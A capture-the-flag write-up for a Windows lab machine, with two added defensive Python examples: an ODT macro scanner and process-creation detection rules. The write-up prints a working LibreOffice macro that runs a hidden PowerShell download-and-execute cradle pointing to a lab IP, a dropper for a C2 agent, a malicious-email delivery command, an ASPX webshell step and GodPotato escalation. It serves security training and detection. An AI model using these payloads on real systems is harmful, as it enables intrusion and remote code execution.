# Job

## Overview

Job is a Windows machine where a job application portal accepts LibreOffice documents sent via email. A malicious ODT with a VBA macro triggers a callback when opened by an automated process. The initial foothold user has write access to the IIS wwwroot, allowing deployment of an ASPX webshell for a higher-privileged shell. The IIS application pool identity carries SeImpersonatePrivilege, enabling a GodPotato SYSTEM escalation.
## Recon

### Nmap

```shell
sudo nmap -sC -sV -vv -oA tcp 10.129.43.232 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.43.232
```

SMTP (25) is open and accepting connections. Port 80 hosts a job application portal:
The site asks applicants to submit their CV as a document attached to an email sent to [email protected].
### SMTP - Guest Relay

Test SMTP for open relay:

The SMTP server accepts mail from unauthenticated senders, so we can send arbitrary emails, including ones with file attachments.
## Foothold

### Malicious LibreOffice Document

Craft a LibreOffice ODT with a VBA macro set to execute on document load. The macro downloads and runs an AdaptixC2 agent:

VBA Macro:
```basic
Sub OnLoad
    Dim os as string
    os = GetOS
    If os = "windows" OR os = "osx" OR os = "linux" Then
        Exploit
    end If
End Sub

Sub Exploit
    Shell("cmd.exe /C ""powershell.exe -nop -w hidden -c $j=new-object net.webclient;if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null){$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;};IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.98:443/ps'));""")
End Sub

Function GetOS() as string
    select case getGUIType
        case 1: GetOS = "windows"
        case 3: GetOS = "osx"
        case 4: GetOS = "linux"
    end select
End Function
```

Set the macro to trigger on the Document Open event: Tools → Customize → Events → Open Document.
The ps PowerShell dropper script served on our HTTP listener:

```powershell
(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.98:443/agent.exe", "C:\Windows\Temp\agent.exe")
Start-Process C:\Windows\Temp\agent.exe
```

agent.exe is an AdaptixC2 agent binary.
Send the document via SMTP using sendemail:

```shell
sendemail -s 10.129.43.232 -f "syk0 <[email protected]>" -t [email protected] \
  -o tls=no -m "Job Application" -a msf.odt
```

An automated process opens the document and we receive an AdaptixC2 beacon as jack.black.
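The mail path above is where a defender gets the first look at this document, before any automated process opens it. The following is an added example (not part of the writeup) of a gateway-side check that unpacks an ODT and reports embedded Basic macros and document-event bindings. It relies on the ODF container layout LibreOffice writes: macro modules under `Basic/`, declared in `META-INF/manifest.xml`, and the Open Document binding stored in `content.xml` as a `script:event-listener` with `script:event-name="dom:load"`. The sample ODT is constructed in-memory with a placeholder macro body; the file name `cv.odt` and the macro name `OnLoad` are assumptions for the test.

```python
"""Gateway check for macro-bearing ODT attachments (added example).

An ODT is a ZIP container: embedded Basic macros live under Basic/ and are
declared in META-INF/manifest.xml; a macro bound to a document event (the
writeup's Open Document event) appears in content.xml as a
<script:event-listener> element with script:event-name="dom:load".
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

SCRIPT_NS = "urn:oasis:names:tc:opendocument:xmlns:script:1.0"
MANIFEST_NS = "urn:oasis:names:tc:opendocument:xmlns:manifest:1.0"
XLINK_NS = "http://www.w3.org/1999/xlink"
ODT_MIME = "application/vnd.oasis.opendocument.text"


def scan_odt(data: bytes) -> Dict[str, object]:
    """Return macro parts and event bindings found in the ODT bytes."""
    macro_files: List[str] = []
    listeners: List[Dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Any member under Basic/ is embedded macro code.
        macro_files.extend(n for n in names if n.startswith("Basic/"))
        # The manifest declares macro parts too; catch ones declared but absent.
        if "META-INF/manifest.xml" in names:
            root = ET.fromstring(zf.read("META-INF/manifest.xml"))
            for entry in root.iter(f"{{{MANIFEST_NS}}}file-entry"):
                path = entry.get(f"{{{MANIFEST_NS}}}full-path", "")
                if path.startswith("Basic/") and path not in macro_files:
                    macro_files.append(path)
        # Event bindings say which script fires on which document event.
        for part in ("content.xml", "styles.xml"):
            if part in names:
                root = ET.fromstring(zf.read(part))
                for el in root.iter(f"{{{SCRIPT_NS}}}event-listener"):
                    listeners.append({
                        "event": el.get(f"{{{SCRIPT_NS}}}event-name", ""),
                        "href": el.get(f"{{{XLINK_NS}}}href", ""),
                    })
    return {"macro_files": macro_files, "event_listeners": listeners,
            "suspicious": bool(macro_files or listeners)}


def build_sample_odt(with_macro: bool) -> bytes:
    """Constructed minimal ODT for testing; not a document from the box."""
    extra_ns, scripts, manifest_extra, members = "", "", "", {}
    if with_macro:
        extra_ns = (f' xmlns:script="{SCRIPT_NS}" xmlns:xlink="{XLINK_NS}"')
        scripts = ("<office:scripts><office:event-listeners>"
                   '<script:event-listener script:event-name="dom:load" script:language="ooo:script" '
                   'xlink:href="vnd.sun.star.script:Standard.Module1.OnLoad?language=Basic&amp;location=document"/>'
                   "</office:event-listeners></office:scripts>")
        # Placeholder macro body; only the container layout matters for the scanner.
        members["Basic/Standard/Module1.xml"] = (
            '<script:module xmlns:script="http://openoffice.org/2000/script" '
            'script:name="Module1" script:language="StarBasic">Sub OnLoad\nEnd Sub</script:module>')
        manifest_extra = ('<manifest:file-entry manifest:full-path="Basic/Standard/Module1.xml" '
                          'manifest:media-type="text/xml"/>')
    content = "".join([
        '<?xml version="1.0" encoding="UTF-8"?>',
        '<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"',
        ' xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0"', extra_ns, ">", scripts,
        "<office:body><office:text><text:p>Curriculum vitae</text:p></office:text></office:body>",
        "</office:document-content>"])
    manifest = "".join([
        f'<manifest:manifest xmlns:manifest="{MANIFEST_NS}">',
        f'<manifest:file-entry manifest:full-path="/" manifest:media-type="{ODT_MIME}"/>',
        '<manifest:file-entry manifest:full-path="content.xml" manifest:media-type="text/xml"/>',
        manifest_extra, "</manifest:manifest>"])
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        # ODF requires the 'mimetype' member first and stored uncompressed.
        zf.writestr(zipfile.ZipInfo("mimetype"), ODT_MIME, compress_type=zipfile.ZIP_STORED)
        zf.writestr("content.xml", content)
        zf.writestr("META-INF/manifest.xml", manifest)
        for name, body in members.items():
            zf.writestr(name, body)
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (False, True):
        print(f"cv.odt (macro={flag}):", scan_odt(build_sample_odt(flag)))
```

A gateway that rejects or quarantines anything where `suspicious` is true stops this foothold regardless of what the macro body does; the event listener check matters because a macro that only fires on a menu click is far less useful to an attacker than one bound to `dom:load`.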
## Lateral Movement

### IIS wwwroot Write Access

Enumerate jack.black's group memberships and file permissions. The account is part of the developers group with write access to the IIS wwwroot:
Drop an ASPX webshell into wwwroot. Use it to execute the same PowerShell dropper for a new AdaptixC2 agent running as the IIS app pool identity:

```powershell
powershell.exe -nop -w hidden -c $j=new-object net.webclient;...IEX ((new-object Net.WebClient).DownloadString('http://10.10.14.98:443/ps1'));
```

New beacon as the IIS application pool account.
## Privilege Escalation

### SeImpersonatePrivilege → GodPotato
The IIS application pool identity has SeImpersonatePrivilege:
SeImpersonatePrivilege is a commonly abused Windows privilege. It allows a process to impersonate any user whose token it can obtain. GodPotato abuses DCOM to coerce SYSTEM to authenticate to a local server, then impersonates that token to spawn a SYSTEM process.
Upload and execute GodPotato to run our implant as SYSTEM. Root flag accessible.
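Every stage of this chain leaves a distinctive parent/child process relationship: the macro's `Shell()` call makes `soffice.bin` spawn `cmd.exe`, the webshell makes `w3wp.exe` spawn a shell, and the SeImpersonatePrivilege abuse produces a SYSTEM process whose parent ran as an `IIS APPPOOL\...` identity. The following detection logic is an added example (not part of the writeup) that runs those rules, plus a PowerShell download-cradle check, over process-creation records. The records are constructed in the shape of Sysmon Event ID 1 fields; the PIDs, the `DefaultAppPool` name, the `JOB` domain and the paths are assumptions, and the last rule keys on the parent's identity rather than its image name because the intermediate binary can be called anything.

```python
"""Process-creation detection for the chain in this writeup (added example).

Rules, in the order the chain unfolds:
  office_spawned_shell - soffice.bin/soffice.exe starts cmd.exe or powershell.exe
  download_cradle      - a command line carries PowerShell download/IEX markers
  iis_spawned_shell    - w3wp.exe starts a shell (ASPX webshell)
  apppool_to_system    - a SYSTEM process whose parent ran as IIS APPPOOL\...
The records below are constructed in the shape of Sysmon Event ID 1 fields;
they are not real logs from the box, and PIDs and the pool name are made up.
"""
import json
import re
from typing import Dict, List

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
OFFICE_PARENTS = {"soffice.bin", "soffice.exe"}
IIS_WORKER = "w3wp.exe"
CRADLE_RE = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|-w(?:indowstyle)?\s+hidden",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """File-name component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Apply every rule to each event; return one alert per rule hit."""
    # Map PID -> user first so a child can be compared with its parent's identity.
    user_by_pid = {e["ProcessId"]: e["User"] for e in events}
    alerts = []
    for e in events:
        image, parent = basename(e["Image"]), basename(e["ParentImage"])
        hits = []
        if parent in OFFICE_PARENTS and image in SHELLS:
            hits.append("office_spawned_shell")
        if CRADLE_RE.search(e["CommandLine"]):
            hits.append("download_cradle")
        if parent == IIS_WORKER and image in SHELLS:
            hits.append("iis_spawned_shell")
        parent_user = user_by_pid.get(e["ParentProcessId"], "")
        if (e["User"].upper() == "NT AUTHORITY\\SYSTEM"
                and parent_user.upper().startswith("IIS APPPOOL\\")):
            hits.append("apppool_to_system")
        alerts.extend({"rule": r, "pid": e["ProcessId"], "image": image, "user": e["User"]}
                      for r in hits)
    return alerts


def ev(pid, ppid, image, parent, cmd, user):
    """Build one constructed process-creation record."""
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent, "CommandLine": cmd, "User": user}


SAMPLE_EVENTS = [
    # Automated LibreOffice run opening the mailed CV (constructed).
    ev("1000", "900", r"C:\Program Files\LibreOffice\program\soffice.bin",
       r"C:\Program Files\LibreOffice\program\soffice.exe",
       r"soffice.bin --headless C:\inbox\cv.odt", r"JOB\jack.black"),
    # The macro's Shell() call: cmd.exe under soffice.bin with a download cradle.
    ev("1010", "1000", r"C:\Windows\System32\cmd.exe",
       r"C:\Program Files\LibreOffice\program\soffice.bin",
       "cmd.exe /C \"powershell.exe -nop -w hidden -c IEX ((new-object Net.WebClient)"
       ".DownloadString('http://10.10.14.98:443/ps'))\"", r"JOB\jack.black"),
    # IIS worker process for the assumed pool name.
    ev("2000", "700", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\svchost.exe",
       'w3wp.exe -ap "DefaultAppPool"', r"IIS APPPOOL\DefaultAppPool"),
    # Webshell command under w3wp.exe.
    ev("2010", "2000", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
       "cmd.exe /c whoami /priv", r"IIS APPPOOL\DefaultAppPool"),
    # SYSTEM child under the app-pool shell: the impersonation jump.
    ev("2020", "2010", r"C:\Windows\Temp\agent.exe", r"C:\Windows\System32\cmd.exe",
       r"C:\Windows\Temp\agent.exe", r"NT AUTHORITY\SYSTEM"),
    # Benign admin PowerShell from Explorer; should not alert.
    ev("3000", "800", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
       r"C:\Windows\explorer.exe", r"powershell.exe -File C:\scripts\backup.ps1", r"JOB\admin"),
]

if __name__ == "__main__":
    print(json.dumps(detect(SAMPLE_EVENTS), indent=2))
```

The `apppool_to_system` rule is the one that catches the GodPotato step without knowing the tool's name: an IIS application pool should never be the parent of a SYSTEM process, so the identity mismatch alone is the signal. Removing SeImpersonatePrivilege from the pool identity, or running the pool under a dedicated low-privilege account, removes the precondition the escalation depends on.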
## Attack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SMTP open relay + job portal | Document submission vector |
| Foothold | Malicious ODT macro + sendemail | Beacon as jack.black |
| Lateral movement | wwwroot write → ASPX webshell | Beacon as IIS app pool |
| Privesc | SeImpersonatePrivilege + GodPotato | SYSTEM |

